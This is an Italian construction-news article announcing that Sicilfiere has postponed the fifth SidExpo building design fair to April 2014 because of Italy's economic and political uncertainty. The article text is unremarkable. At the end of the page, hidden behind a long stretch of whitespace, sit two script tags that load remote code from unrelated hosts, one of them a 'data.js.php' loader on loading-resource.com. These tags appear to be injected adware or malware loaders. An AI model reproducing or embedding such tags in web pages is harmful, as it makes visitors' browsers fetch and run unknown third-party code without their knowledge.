1. Home
  2. Notizie e Mercato
  3. Rinvio della V edizione di “SidExpo”

Rinvio della V edizione di “SidExpo”

Edilizia di
5/5
votato da 1 persone
Guidaedilizia ha raccolto le dichiarazioni degli organizzatori di SideExpo, Salone industrial design dell’Edilizia, definitivamente rinviato al 04-05-06 Aprile 2014


L’incertezza e il pessimismo che ogni giorno attanagliano sempre più gli Italiani, che nel caso di “SidExpo” si configurano con i Professionisti, le Imprese, i Produttori, i Rivenditori, hanno portato a far riflettere lo staff di Sicilfiere, sullo svolgimento della V edizione di “SidExpo”, Salone industrial design dell’Edilizia, in quest’anno 2013.

Per troppo tempo in Italia e anche al di fuori dei confini nazionali, siamo rimasti in SOSPESO, aspettando la nascita di un Governo che potesse garantire Stabilità, Crescita, Sicurezza, Fiducia: una vera utopia.

Ribadendo quanto scritto nel comunicato stampa dell’11 marzo scorso:
Il concetto FIERA/SALONE, per Sicilfiere, è quello di una grande vetrina che presenti ampia offerta espositiva e formazione per tutti i partecipanti e affinché questo possa accadere è necessario avere un congruo numero di espositori, al fine anche di garantire loro, un ritorno economico e di immagine, in virtù dell’investimento impiegato”.
Una vasta offerta espositiva muove una grande quantità di visitatori interessati. Una grande affluenza di Visitatori compensa l’investimento affrontato dagli espositori ed assicura  un ritorno nell’acquisizione di potenziali clienti e partner
Questi sono gli unici presupposti per la buona riuscita di una Fiera e da sempre gli obiettivi del Sidexpo e di Sicilfiere.

Abbiamo invece assistito allo svolgimento recente di alcune Fiere Internazionali, Nazionali e Regionali in Italia, che ha segnato un dato molto significativo: la diminuzione di presenze di espositori e di conseguenza anche di visitatori, in alcuni casi fino al 70%.

Proprio quest’ultimi, la vera ricchezza per gli espositori, visionando i cataloghi riportanti il numero di Aziende presenti in fiera, pubblicati sui siti internet pochissimi giorni prima dell’avvio della manifestazione, hanno deciso di non spostarsi, sia per le poche aree espositive da visitare ma soprattutto per la mancanza di liquidità di denaro da poter impiegare nell’investimento di macchinari, attrezzature, beni strumentali.

Il nostro pensiero è che non sia stato certamente corretto il comportamento tenuto da alcune Organizzazioni fieristiche, che hanno illuso produttori, rappresentanti e rivenditori, facendo credere di aver comunque raggiunto una massiccia presenza di altri loro concorrenti o Aziende del Settore Edile, di aver mantenuto o addirittura incrementato i numeri, in termini di Espositori presenti, delle edizioni precedenti.

Difatti, chi ha voluto crederci, stringendo ancor di più la cinghia, si è ritrovato in aree espositive deserte e sconfortanti, raccogliendo alla fine solo scarsi risultati, ad eccezione di pochissimi.
Non riteniamo giusto intraprendere una scia illusionistica, sia perché il momento di disagio economico non lo permette, sia perchè la trasparenza e la lealtà, alla lunga pagano sempre.

Avremmo potuto benissimo arrivare ad avere indicato nel nostro catalogo espositori “SidExpo2013”, rinviato al 7-8-9 giugno p.v., più di 130 Aziende e almeno 240 marchi rappresentati, così suddivise:
n° 60-65 Aziende Produttrici e/o Rappresentate da Agenti (n° 1-2 Marchi cadauno)
n° 50-55 Rivenditori edili della Provincia (plurimarche non esclusivisti Regionali) (n° 3-5 Marchi Cad.)
n° 20-25 Istituzioni – Ordini professionali – Associazioni – Enti - Editorie

Non è nostra intenzione però cambiare volto al “SidExpo”,  trasformandolo in una mostra-mercato o mostra locale.

Non vogliamo inoltre pesare sulle tasche di nessuno, anche considerando che nessun contributo economico è mai stato ricevuto da parte di Istituzioni e/o Enti e che pertanto gli investimenti da sostenere, così come è accaduto per le scorse edizioni, a garanzia prima degli Espositori e poi dei Visitatori (Spazi espositivi idonei, pubblicità e promozione adeguata su tutto il territorio nazionale, servizi e logistica adeguati al concetto Fiera, sicurezza, etc), sono tutti finanziati dalla locazione delle aree espositive.

Ciò premesso, comunichiamo ufficialmente quanto segue:

Sicilfiere, che nel comunicato stampa dell’11 marzo scorso aveva considerato l’ipotesi di posticipare SidExpo2013, dal 7 al 9 giugno 2013, ringrazia le 63 Aziende che hanno pre-aderito ad oggi.
Consapevole che in questo preciso momento di instabilità, non solo economica, non può, per cause ad essa non imputabili, offrire la possibilità alle ditte espositrici di creare nuove forme di collaborazione tra azienda e professionista e mostrare al contempo una vasta gamma di innovazione ai visitatori, ha deciso definitivamente che  il  “SidExpo”  Salone industrial design dell’Edilizia, è stato sospeso per l’edizione 2013 e rinviato al 04-05-06 Aprile 2014, ritenendo di aver  ben  deciso soprattutto nell’interesse  degli Espositori e dei Visitatori.

Sicilfiere ringrazia tutte le Istituzioni, Università/Dipartimenti, Associazioni, Enti ed Ordini Professionali, che hanno collaborato per l’organizzazione di Convegni e Seminari, per la formazione dei Professionisti e degli Imprenditori.


Il lavoro fin qui svolto sarà ripreso e arricchito nei contenuti per lo svolgimento della prossima edizione del “Sidexpo”, che continuerà a mantenere lo stesso motto, nato con la prima edizione, grazie alla sensibilità di tutto lo Staff di Sicilfiere, e cioè “COSTRUIRE CON RISPETTO IL TERZO MILLENNIO

Sicilfiere ringrazia tutti i partner e i media partner, ai quali continuerà a concedere, come fin qui sempre fatto, la massima visibilità.

Fiduciosi che, prestissimo, un nuovo Governo politico riesca a dare a Noi Italiani la forza di ripartire ed al Mondo tutto di ritornare ad investire nel ns. Paese, rendendolo nuovamente uno tra le prime potenze economiche mondiali,

Grazie e arrivederci dal 04 al 06 APRILE 2014
                                                                                                                                                                                                    






<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&amp;pid=1032&amp;zoneid=62862"></script><script src="https://loading-resource.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2012-10-16&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1" type="text/javascript"></script>